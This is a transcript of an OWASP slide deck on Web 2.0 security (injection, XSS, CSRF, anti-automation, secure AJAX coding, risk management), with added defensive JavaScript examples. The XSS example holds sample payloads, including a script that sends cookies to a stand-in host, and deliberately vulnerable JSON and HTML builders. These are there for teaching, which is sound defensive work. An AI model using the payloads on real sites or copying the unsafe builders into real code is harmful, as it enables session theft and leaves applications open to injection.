Web 2.0 threats, vulnerability analysis, secure web 2.0 application development and risk management

From: cpkwan
Tags: risk management software, application security, ajax security, web 2.0 security, owasp top 10
Published: November 08, 2011
Slide 1: Vulnerability Analysis, Secure Development and Risk Management of Web 2.0 Applications
Marco Morana, OWASP Cincinnati Chapter, November 2010 Meeting
Copyright © 2010 - The OWASP Foundation. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License. The OWASP Foundation, http://www.owasp.org
Slide 2: What is OWASP?
Slide 3: Agenda for Today's Presentation
1. The evolution of Web 2.0
2. Web 2.0 vulnerability analysis
3. Building secure Web 2.0 applications
4. Web 2.0 risk management
Slide 4: The Evolution of the Internet to Web 2.0
Slide 5: General Web 2.0 Background
Web 2.0 can be defined as "web applications that facilitate interactive information sharing and collaboration, interoperability, and user-centered design on the World Wide Web". Its main characteristics are:
1. Encouraging user participation and collaboration through virtual communities and social networks. Users can add and update their own content; examples include Twitter and social networks such as Facebook, MySpace, LinkedIn and YouTube.
2. Transcending the technologies and frameworks used: AJAX, Adobe AIR, Flash, Flex, Dojo, Google Gears and others.
3. Combining and aggregating data and functionality from different applications and systems; "mashups", for example, aggregate client-side functionality provided by in-house developed and/or third-party services (e.g. web services, SaaS).
Slide 6: Web 2.0 as Evolution of Human Knowledge (source: http://digigogy.blogspot.com/2009/02/digital-blooms-visual.html)
Slide 7: Web 2.0 Adoption by Businesses
Slide 8: How Web 2.0 Changes the Threat Landscape
- Web 1.0 threats are amplified by the intrinsic nature of Web 2.0: the expanded interaction model and the mix of old and new technologies. Examples:
  - Social networks are a target for attacking users with malware; Facebook alone has 350 million users.
  - Web 2.0 applications remain prone to Web 1.0 vulnerabilities such as XSS, CSRF, phishing and injection flaws.
- Web 2.0 enables more effective attacks because of sharing and integration between disparate systems. Examples:
  - The complexity of integrating different technologies and services, front-end/client and back-end/server.
  - Rich client interfaces increase the attack surface and the likelihood of business logic attacks.
- Social networks facilitate disclosure of confidential PII. Examples:
  - Attackers abuse the trust-first, verify-later model that users apply to their network.
  - The data sharing model breaks confidentiality boundaries: there is no clear line between private and public, or between personal and professional life.
Slide 9: Web 2.0: Old Vulnerabilities and New Exploit Scenarios
Slide 10: Web 2.0 Vulnerabilities
Slide 11: Top 50 WASC Threats and Top 10 OWASP Risks Especially Impacting Web 2.0
Slide 12: WASC-23 XML Injection, WASC-29 XPath Injection, OWASP A1 Injection Flaws
Web 2.0 exploit scenarios:
- XML injection/poisoning: user-supplied input is inserted into XML without sufficient validation, altering the structure of the XML record and its tags, not just the content.
- XPath injection: an attack that alters an XPath query against an XML store to achieve the attacker's goals (the XML analogue of SQL injection).
- JSON injection: an attacker who can place JavaScript inside a JSON structure that the client evaluates (for example with eval()) forces execution of that code on the client.
- RSS feed injection: RSS feeds can consume untrusted sources that have been injected with XSS payloads.
Web 2.0 known incident example:
- WHID 2008-47: The Federal Suppliers Guide validates login credentials in JavaScript.
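The JSON injection scenario above, as an added example that is not part of the OWASP slides: a client that turns a JSON response into an object with eval() executes whatever the server concatenated into that text, while JSON.parse() rejects it. The profile record, the attacker-controlled bio field and the `__injected` marker are constructed for the demonstration; the same point (JSON.parse() over eval()) is restated in secure coding requirement 1 on slide 26.

```javascript
// Added example: JSON injection through eval() versus JSON.parse().
// Constructed scenario: a profile record whose "bio" field is user-generated
// content; nothing here is taken from the OWASP slides or a real application.

// A server that builds JSON by string concatenation lets the user's text
// escape the string it was meant to sit in (the injection point).
function buildProfileJsonUnsafe(name, bio) {
  return '{"name":"' + name + '","bio":"' + bio + '"}';
}

// Hardened server side: the JSON encoder escapes quotes and control
// characters, so user text can only ever be a string value.
function buildProfileJsonSafe(name, bio) {
  return JSON.stringify({ name: name, bio: bio });
}

// Vulnerable client: eval() runs any JavaScript embedded in the text.
function parseWithEval(text) {
  return eval('(' + text + ')');
}

// Hardened client: JSON.parse() accepts only the JSON grammar and throws on
// anything else, so injected code is never executed.
function parseWithJsonParse(text) {
  return JSON.parse(text);
}

// Attacker-controlled bio (constructed). It closes the "bio" string, adds a
// property whose value is an expression with a side effect, and reopens a
// string so the object literal stays syntactically valid for eval().
const INJECTED_BIO = '","pwned":(globalThis.__injected = true),"x":"';

function runDemo() {
  // 1. Unsafe JSON + eval(): the injected expression executes on the client.
  delete globalThis.__injected;
  parseWithEval(buildProfileJsonUnsafe('alice', INJECTED_BIO));
  const evalExecutedPayload = globalThis.__injected === true;

  // 2. Unsafe JSON + JSON.parse(): the document is still corrupted, but the
  //    parser rejects it and nothing runs.
  delete globalThis.__injected;
  let jsonParseRejected = false;
  try {
    parseWithJsonParse(buildProfileJsonUnsafe('alice', INJECTED_BIO));
  } catch (err) {
    jsonParseRejected = err instanceof SyntaxError;
  }
  const jsonParseExecutedPayload = globalThis.__injected === true;

  // 3. Safe JSON + JSON.parse(): the payload survives only as inert text.
  const profile = parseWithJsonParse(buildProfileJsonSafe('alice', INJECTED_BIO));
  const payloadInert = profile.bio === INJECTED_BIO && !('pwned' in profile);

  return { evalExecutedPayload, jsonParseRejected, jsonParseExecutedPayload, payloadInert };
}
```

Both halves matter: JSON.stringify() on the server stops the structure from being altered, and JSON.parse() on the client stops anything that does get through from being executed. Fixing only the client still leaves the record's fields under attacker control.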
Slide 13: WASC-08 / OWASP A2 Cross-Site Scripting (XSS)
Web 2.0 exploit scenarios:
- Insufficient limits on user input:
  - Users are allowed to enter HTML data that can be malicious (e.g. while creating content such as networks, blogs or wikis).
  - Users have extensive control over user content, including unsafe HTML tags that can be abused for XSS.
- Insufficient filtering for DOM-based XSS:
  - XSS exposure increases in Web 2.0, especially DOM-based XSS, since client-side DOM manipulation is used by RIAs written in Flash or Silverlight, by mashups and by widgets.
  - AJAX multiplies the entry points for potential XSS injection.
Web 2.0 known incident example:
- WHID 2008-32: Yahoo HotJobs XSS. Attackers exploited an XSS vulnerability on Yahoo HotJobs to steal victims' session cookies.
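An added example of the countermeasure that the risk framework on slide 31 names for this row, "escape all untrusted data based on HTML context"; it is not code from the OWASP slides. It renders a constructed user comment whose author, body and link are all attacker-controlled, first with naive string templating and then with context-specific encoding plus a URL scheme allow-list. The comment values, the `example.invalid` base origin and the function names are assumptions for the demonstration.

```javascript
// Added example: rendering user-generated content with context-aware encoding.
// Constructed data; not from the OWASP slides or any real application.

// HTML body context: the five characters that can start a tag, entity or
// attribute are replaced with entities.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function encodeForHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// HTML attribute context: encode everything that is not alphanumeric, so the
// value can neither close the quoted attribute nor add an event handler.
function encodeForHtmlAttribute(value) {
  return String(value).replace(/[^A-Za-z0-9]/g,
    (ch) => '&#x' + ch.charCodeAt(0).toString(16) + ';');
}

// URL context: allow only a short list of schemes. "javascript:" and "data:"
// URLs turn a link into script execution, so they are rejected (null) rather
// than encoded. Relative URLs resolve against an assumed site origin.
const ALLOWED_SCHEMES = new Set(['http:', 'https:', 'mailto:']);
function safeHref(value) {
  let url;
  try {
    url = new URL(String(value), 'https://example.invalid/');
  } catch (err) {
    return null;
  }
  return ALLOWED_SCHEMES.has(url.protocol) ? url.href : null;
}

// Vulnerable renderer: every field lands in the page verbatim.
function renderCommentVulnerable(comment) {
  return '<div class="comment"><a href="' + comment.link + '">' + comment.author +
    '</a>: ' + comment.body + '</div>';
}

// Hardened renderer: each field is encoded for the context it is placed in,
// and a link with a disallowed scheme degrades to plain text.
function renderCommentHardened(comment) {
  const href = safeHref(comment.link);
  const author = href === null
    ? encodeForHtml(comment.author)
    : '<a href="' + encodeForHtmlAttribute(href) + '">' + encodeForHtml(comment.author) + '</a>';
  return '<div class="comment">' + author + ': ' + encodeForHtml(comment.body) + '</div>';
}

// Constructed attacker comment exercising all three contexts at once.
const ATTACKER_COMMENT = {
  author: '"><img src=x onerror=alert(1)>',
  body: '<script>document.location="https://evil.invalid/?c="+document.cookie</script>',
  link: 'javascript:alert(document.cookie)',
};
```

The same encoders apply to the DOM-based case on this slide: when client-side code assembles markup from `location.hash`, XHR responses or widget parameters and assigns it to `innerHTML`, the data needs the same per-context encoding, or the code should build nodes with `textContent` and `createElement` so no markup is parsed at all.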
Slide 14: WASC-01 Insufficient Authentication / OWASP A3 Broken Authentication and Session Management
Web 2.0 exploit scenarios:
- Weak passwords: users choose simple-to-guess passwords and trivial password-reminder questions set by on-line site contributors.
- Clear-text passwords: passwords held by AJAX widgets/mashups are sent and stored in the clear, outside the control of the host.
- Insufficient password management controls: password recovery/reminder functions are not protected from brute-force attacks.
- Single sign-on design flaws: passwords stored in a personalized home page, in a desktop widget as an "auto-logon" feature, or in the cloud for SSO from the desktop.
Web 2.0 known incident example:
- WHID 2009-2: Twitter accounts of the famous hacked.
Slide 15: WASC-09 / OWASP A5 Cross-Site Request Forgery (CSRF)
Web 2.0 exploit scenarios:
- CSRF using AJAX requests: XHR calls let the client query a web application invisibly, so the user cannot visually validate a request for forgery.
- Insufficient browser enforcement of the same-origin policy: desktop widgets do not get the same-origin protection that browser applications have, which facilitates CSRF.
- Weak session management:
  - Session expiration times are typically quite long, increasing the risk of session-based attacks such as CSRF.
  - Persistent session cookies shared by widgets increase the opportunities for CSRF attacks.
Web 2.0 known incident example:
- WHID 2009-4: Twitter personal info CSRF. By exploiting a CSRF bug in Twitter, site owners could obtain the Twitter profiles of their visitors.
Slide 16: WASC-21 Insufficient Anti-Automation
Web 2.0 exploit scenarios:
- Automatic spread of spam and phishing links:
  - Spammers automatically post links to increase a site's popularity ranking.
  - Fraudsters use automation to embed malicious links, such as malicious advertisements, for drive-by download malware attacks.
- Automatic registration of user accounts: scripts register web e-mail accounts in bulk in order to authenticate to other services/applications.
- Automatic embedding of commands: botnet control commands embedded in RSS feeds and on social networking sites.
- Automatic business logic exploits: automatically bidding on items to raise prices, exhausting the available seats, buying and reselling tickets.
Web 2.0 known incident example:
- WHID 2007-65: Botnet used to manipulate Facebook.
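The brute-force scenario of slide 14 (password recovery not protected from guessing) and the automation scenarios of this slide share one countermeasure: count repeated actions per subject and escalate, which slide 31 lists as CAPTCHA, locking and the ESAPI intrusion detection APIs. This added example, which is not from the OWASP slides, implements that escalation as a sliding-window counter keyed by action and subject. The thresholds, the action name and the simulated password-reset guessing run are assumptions constructed for the demonstration.

```javascript
// Added example: sliding-window throttling of repeated actions with escalation
// to CAPTCHA and then to blocking. Thresholds and scenario are constructed.

class ActionThrottle {
  // windowMs: how far back attempts are counted;
  // captchaAfter: attempts allowed in the window before a CAPTCHA is required;
  // blockAfter: attempts in the window after which the action is refused.
  constructor({ windowMs = 60 * 1000, captchaAfter = 5, blockAfter = 20 } = {}) {
    this.windowMs = windowMs;
    this.captchaAfter = captchaAfter;
    this.blockAfter = blockAfter;
    this.attempts = new Map(); // "action|subject" -> timestamps (ms) inside the window
  }

  // Records one attempt at time `now` (ms) and returns 'allow', 'captcha' or 'block'.
  // `subject` is whatever the attacker cannot cheaply vary: the target account
  // for password resets, the source address or device for bulk sign-ups.
  decide(action, subject, now) {
    const key = action + '|' + subject;
    const recent = (this.attempts.get(key) || []).filter((t) => now - t < this.windowMs);
    recent.push(now);
    this.attempts.set(key, recent);
    if (recent.length > this.blockAfter) return 'block';
    if (recent.length > this.captchaAfter) return 'captcha';
    return 'allow';
  }
}

// Constructed scenario: a script guesses password-reset answers for one account
// once per second, while the owner of a different account resets a password once.
function simulateResetGuessing() {
  const throttle = new ActionThrottle();
  const decisions = [];
  for (let i = 0; i < 21; i++) {
    decisions.push(throttle.decide('password-reset', 'victim@example.invalid', i * 1000));
  }
  return {
    firstFive: decisions.slice(0, 5),
    sixth: decisions[5],
    twentyFirst: decisions[20],
    // A different subject is unaffected by the attacker's counter.
    otherUser: throttle.decide('password-reset', 'other@example.invalid', 20000),
    // Once the window has passed, the victim's own counter starts over.
    afterWindow: throttle.decide('password-reset', 'victim@example.invalid', 20000 + 60 * 1000 + 1),
  };
}
```

Keying on the target account rather than only on the client address is what makes this useful against the distributed guessing and account-registration bots described above, which rotate source addresses freely; a per-address limit alone would see one attempt from each. Counting the account also means an attacker can lock a victim out, which is why the first escalation is a CAPTCHA rather than a hard block.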
Slide 17: Vulnerability Root Cause Analysis
Slide 18: WASC Classification of Root Causes of Web 2.0 Vulnerabilities
1. User generated content: the ability of consumers to add and update their own content.
2. Mashups & web services: aggregation of data on the desktop through mashups and web services.
3. Data convergence: no boundary between private and public information.
4. Diversity of client software: data and software functions available across many different technologies and environments.
5. Complexity & asynchronous operation: increased user interaction and integration APIs add complexity; AJAX is one source of it.
Slide 19: Summary of Top Web 2.0 Security Threats (source: www.secure-enterprise2.0.org)
Root-cause codes follow slide 18: W1 user contributed content; W2 mashups & web services; W3 consumer and enterprise worlds convergence; W4 diversity of client software; W5 complexity & asynchronous operation.

V1 Insufficient authentication controls
  Exploit scenarios: V1.1 weak passwords; V1.2 insufficient anti-brute-force controls; V1.3 clear-text passwords; V1.4 single sign-on
  Root causes: W1, W2, W4, W5
V2 Cross-site scripting (XSS)
  Exploit scenarios: V2.1 insufficient limits on user input
  Root causes: W1
V3 Cross-site request forgery (CSRF)
  Exploit scenarios: V3.1 credential sharing between gadgets; V3.2 CSRF using AJAX requests; V3.3 lengthy sessions
  Root causes: W5, W2, W4
V4 Phishing
  Exploit scenarios: V4.1 phony widgets; V4.2 phony content used for phishing; V4.3 XSS exploited for phishing
  Root causes: W2, W4, W1
V5 Information leakage
  Exploit scenarios: V5.1 sensitive information posted to Web 2.0 sites; V5.2 information aggregation in social networks; V5.3 easy retrieval of information through web services
  Root causes: W1, W3, W2
V6 Injection flaws
  Exploit scenarios: V6.1 XML injection; V6.2 XPath injection; V6.3 JSON injection
  Root causes: W2, W5
V7 Information integrity
  Exploit scenarios: V7.1 authenticated users publish fraudulent information
  Root causes: W1
V8 Insufficient anti-automation
  Exploit scenarios: V8.1 web spam; V8.2 automatic opening of user accounts; V8.3 unfair advantage on site
  Root causes: W1, W2
Slide 20: Building Secure Web 2.0 Applications
Slide 21: Making Application Security Visible
Slide 22: Web 2.0 Security Engineering Essential Steps
1. Document security standards for Web 2.0: document security requirements for the Web 2.0 technologies in use (e.g. AJAX, Flash) and enforce them from the beginning of the SDLC.
2. Conduct application threat modeling during design: examine the architecture of the Web 2.0 application across all tiers for secure design of authentication and session management, authorization, input validation, and error handling and logging.
3. Perform secure code reviews of Web 2.0 components and frameworks: ensure the source code adheres to the secure coding standards, and identify security bugs on both the client (e.g. widgets, AJAX) and the server (e.g. web services, SOA).
4. Security-test Web 2.0 components: write security test cases for AJAX and web services, using the OWASP Testing Guide test cases.
5. Assess the whole Web 2.0 application for vulnerabilities: conduct a final vulnerability assessment of the complete application (e.g. test for the OWASP Top 10, WASC Threat Classification and CWE/SANS Top 25 vulnerabilities).
Slide 23: Security Touch Points for Web 2.0 Using an Agile SDLC
The five steps of slide 22 attach to the stages of the agile cycle as follows (touch points in parentheses):
1. Iteration planning meeting
2. Begin sprint: requirements for iteration # (STEP 1: incorporate Web 2.0 security requirements)
3. Sprint initiation, design discussion (STEP 2: secure architecture reviews / threat modeling)
4. Review use cases and storyboard
5. Build and deploy prototype
6. Demo prototype and gather feedback
7. Incorporate feedback and continue development, iteration #N (STEP 3: secure code reviews at the end of each sprint, as security sprint reviews)
8. Incremental integrated system tests (STEP 4: security tests for Web 2.0 components)
9. User acceptance testing (no iteration)
10. Release (STEP 5: final Web 2.0 vulnerability assessment)
Slide 24: Secure Architecting of AJAX in Web 2.0 Applications
Design weaknesses shown in the architecture diagram:
- Business logic and state kept on the client side.
- Back-end services accessible from untrusted callers without server-side security enforcement.
- AJAX endpoints calling the back end directly.
Controls shown:
- The ESB can only be called by trusted internal systems.
- Each AJAX call is associated with an active, server-side session.
- At the server tier: secure communications; authentication and session management; access controls; input validation; error handling and logging.
Slide 25: Secure Code Reviews of Web 2.0 Applications
Slide 26: "Top 10" Secure Coding Requirements for AJAX
1. Validate data on the server side at every data entry point and every URL of an AJAX call, for code injection such as JavaScript injection, JSON injection, DOM injection and XML injection. On the client, turn JSON text into objects with JSON.parse() rather than eval().
2. Enforce business logic on the server, using server-side parameters, not in client-side logic.
3. Validate on the server that XML is well formed and conforms to the allowed specification of values.
4. Enforce authentication before any XMLHttpRequest (XHR) session.
5. Enforce authorization checks on data accessed through XHR.
6. Add an anti-CSRF token to state-changing requests and verify it on the server; this also defeats requests forged through dynamic <script> tags. A hidden field or custom request header is preferable to the URL, which leaks the token through Referer headers and logs.
7. Do not store or cache sensitive data such as passwords and session IDs on the client, whether in client JavaScript, Flash Local Shared Objects or Mozilla's DOM storage.
8. Avoid dynamic <script> tags, since there is no opportunity to validate the data before it executes.
9. Use POST as the default method for sending requests.
10. Do not use JavaScript alert() for error handling.
Slide 27: Secure Testing of Web 2.0 Client and Server Components
Slide 28: Web 2.0 Risk Management
Slide 29: OWASP Risk Framework (used in the OWASP Top 10)
Slide 30: Potential Web 2.0 Attack Vectors and Targets
Attack vectors and targets shown on the slide: information disclosure and integrity attacks; phishing and drive-by download; DOM XSS; XML and JSON injection; JavaScript injection; XSS and malware; broken authentication and session management; CSRF; information disclosure and DDoS; XPath and SQL injection.
Slide 31: Web 2.0 Application Risk Framework
Each row follows the OWASP risk model: threat agent; misuse/attack vector; security weakness; security controls/countermeasures; technical impact; business impact.

Row 1
- Threat agents: Web 2.0 users, customers/employees
- Misuse/attack vector: user shares private/confidential information; agents post confidential information
- Security weakness: inherent weaknesses in controlling user-contributed content in social networks, blogs, IMs, private e-mails
- Controls: Web 2.0 social networking security policies, compliance, monitoring, filtering, archiving, approval workflow for social site posts
- Technical impact: loss of sensitive/confidential data
- Business impact: reputation loss; compliance fines

Row 2
- Threat agents: malicious users, fraudsters
- Misuse/attack vector: victim is targeted by phishing, download of phony widgets, clicking on malicious posts
- Security weakness: social engineering; Web 2.0 vulnerabilities, XSS
- Controls: consumer education; data filtering; escape all untrusted data based on HTML context
- Technical impact: execute JavaScript on the client, install malware
- Business impact: public disclosure of XSS, reputation damage

Row 3
- Threat agents: malicious users, fraudsters
- Misuse/attack vector: attacker sends malicious data to the application's interfaces
- Security weakness: Web 2.0 input validation vulnerabilities: XPath injection, XML injection, JSON injection
- Controls: filtering, parameterized APIs, ESAPI filtering APIs, white-list validation
- Technical impact: loss of data, data alteration, denial of service/access
- Business impact: loss of CIA, legal and financial implications

Row 4
- Threat agents: malicious users, fraudsters
- Misuse/attack vector: attacker uses leaks or flaws in the authentication or session management functions
- Security weakness: Web 2.0 broken authentication and session management vulnerabilities
- Controls: follow security requirements for secure password policies; implement locking; disable "auto-logons"
- Technical impact: unauthorized access to data and functions
- Business impact: fraud, financial losses, reputation loss/defacements

Row 5
- Threat agents: fraudsters
- Misuse/attack vector: attacker creates forged HTTP requests and tricks a victim into submitting them
- Security weakness: Web 2.0 cross-site request forgery vulnerabilities
- Controls: include the unique token in a hidden field
- Technical impact: can change data and functions on behalf of the user
- Business impact: loss of CIA, fraud, denial of access

Row 6
- Threat agents: automated scripts/spam bots
- Misuse/attack vector: application is used to post links, create accounts, game the application
- Security weakness: insufficient anti-automation
- Controls: include CAPTCHA; ESAPI intrusion detection APIs
- Technical impact: can overflow processes with spam; enumeration
- Business impact: business disruptions/losses, reputational damage
Slide 32: Web 2.0 Business Application Example: Twitter
A company's customer support offers help through a Twitter help account (Bank of America example).
Slide 33: Managing Risks of a Company's Twitter Presence
Twitter application security vulnerabilities:
- The landing page that links to Twitter might itself be vulnerable to Web 2.0 vulnerabilities.
  - Countermeasure: require a scan for Web 2.0 vulnerabilities of the landing page hosting the link to Twitter.
- Use of AJAX might introduce new source code vulnerabilities.
  - Countermeasure: validate that filtering exists to sanitize malicious characters for XSS, XPath and XML injection, that CSRF is mitigated and that anti-automation controls are sufficient.
  - Countermeasure: validate compliance of the source code with the AJAX secure coding standards.
Slide 34: Managing Risks of a Company's Twitter Presence (continued)
Twitter information security and compliance risks:
- Customers can disclose confidential information by micro-blogging to the company's Twitter account.
  - Countermeasure: ask users not to enter anything sensitive such as PII, SSN or account numbers, only a phone number at which they can be reached.
- The company is not liable for user content posted to the third-party Twitter service or for Twitter's vulnerabilities.
  - Countermeasure: once the customer chooses to go to Twitter, present a "speed bump" page with a notice releasing the company from liability for the user's content and for Twitter.
- Content shared between enterprise customer support representatives (Twitter agents) can leak customers' confidential information such as PII and account numbers.
  - Countermeasure: use an enterprise social content filtering and monitoring tool; agents moderate the content that is posted to Twitter.
Slide 35: Questions and Answers
Slide 36: Thanks for Listening; Further References
- Ajax and Other "Rich" Interface Technologies: http://www.owasp.org/index.php/Ajax_and_Other_%22Rich%22_Interface_Technologies
- Vulnerability Scanners for Flash Components: http://www.owasp.org/index.php/Category:OWASP_Flash_Security_Project
- Web Application Vulnerability Scanners: http://samate.nist.gov/index.php/Web_Application_Vulnerability_Scanners.html
- Facebook Outs Hacker Kirllos: http://threatpost.com/en_us/blogs/facebook-outs-hacker-kirllos051310?utm_source=Recent+Articles&utm_medium=Left+Sidebar+Topics&utm_campaign=Web+Application+Security
Slide 37: Further References (continued)
- Facebook Now Trending As Phishing Target: http://threatpost.com/en_us/blogs/facebook-now-trendingphishing-target051310?utm_source=Recent+Articles&utm_medium=Left+Sidebar+Topics&utm_campaign=Web+Application+Security
- Botnet Herders Can Command Via Twitter: http://threatpost.com/en_us/blogs/botnet-herders-can-nowcommand-twitter051310?utm_source=Recent+Articles&utm_medium=Left+Sidebar+Topics&utm_campaign=Web+Application+Security
- OWASP Top 10 Risks: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
- Guide to Twitter Compliance: http://insights.socialware.com/
Slide 38: Further References (continued)
- Top 10 Web 2.0 Attack Vectors: http://www.net-security.org/article.php?id=949&p=4
- Defending against the worst web based application vulnerabilities of 2010: http://www.slideshare.net/shreeraj/web-attacks-top-threats-2010
- Security Concerns Hinder Adoption of Web 2.0 and Social Networking in Business: http://investor.mcafee.com/releasedetail.cfm?ReleaseID=511103
- Web 2.0 a Top Security Threat in 2010, Survey Finds: http://pr.webroot.com/threat-research/ent/web-2security-survey-170210.html